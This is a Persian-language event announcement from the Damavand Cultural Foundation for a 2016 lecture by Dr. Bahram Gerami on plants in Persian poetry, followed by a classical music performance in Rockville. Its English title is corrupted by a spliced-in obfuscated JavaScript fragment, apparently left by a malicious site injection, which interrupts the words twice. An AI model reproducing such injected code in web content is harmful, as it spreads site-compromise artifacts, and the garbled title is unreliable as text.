Damavandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Cultural Foundation presents: Plants in a thousandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and years of Persian poetry - Sunday, September 18

بنیاد فرهنگی دماوند
برنامه یکشنبه 18ماه سپتامبر -2016
بخش نخست
گل و گیاه در هزار سال شعر فارسی
رمز و رازی ناشناخته در تاریخ ادبیات ایران
سخنران : دکتر بهرام گرامی
(با نمایش بیش از پنجاه اسلاید رنگی از گیاهان و اشعار)
مختصری در باره سخنران: دکتر بهرام گرامی تحصیلات ابتدائی و متوسطه را در زادگاه خود تهران به‏پایان رسانید. لیسانس، فوق لیسانس و دکترا را در علوم گیاهی به ترتیب از دانشگاه تهران، دانشگاه آمریکایی بیروت و دانشگاه مانی‏توبا در کانادا دریافت کرد. پس از عزیمت به آمریکا در سال 1985، به مدت ده سال در دانشگاه کالیفرنیا در دیویس به تحقیق پرداخت. وی به عنوان استاد مدعو در هنگ‏کنگ، بحرین و چین تدریس کرده است.
دکتر گرامی مؤلّفِ “گل و گیاه در هزار سال شعر فارسی” (تشبیهات و استعارات) است. این کتاب با شرح و معنی همۀ ابیات مربوط به گل و گیاه در دیوان حافظ و با مقدّمۀ زنده یاد ایرج افشار در 1386 و 1389 از سوی انتشارات سخن در تهران منتشر شد و مورد استقبال مجامع علمی و ادبی قرار گرفت. مقاله‌های گل و گیاه در اشعار پیشگامان شعر فارسی، گل و گیاه در شاهنامۀ فردوسی، گل و گیاه در خمسۀ نظامی گنجوی، گیاهان تورات و کتاب گیاهان در قرآن از دیگر تألیفات اوست. دکتر گرامی سمت ویراستار مشاور را دانشنامۀ ایرانیکا در زمینه گل و گیاه نیز به عهده دارد. این گفتار پیش از این در كشورهاى آلمان، انگلستان، چین، فرانسه، قطر و كانادا و در تعدادی از شهرهای آمریکا و ایران ارائه شده است.
بخش دوم
اجرای موسیقی کلاسیک ایران توسط کاظم داودیان (سنتور) و حسین کشاورز – آواز
زمان-یکشنبه 18 سپتامبر 2016
گرد همائی ساعت 5:30 بعد از ظهر
(پذیرائی- چای –قهوه-شیرینی)
شروع سخنرانی ساعت 6:00
Montgomery college-Rockville
TC (Technical Center) Room#136
51 Mannakee Street
Rockville, MD 20850
N. Campus Drive, Park at Lot#9 – Across from Technical Center
This entry was posted in Lecture, literature. Bookmark the permalink.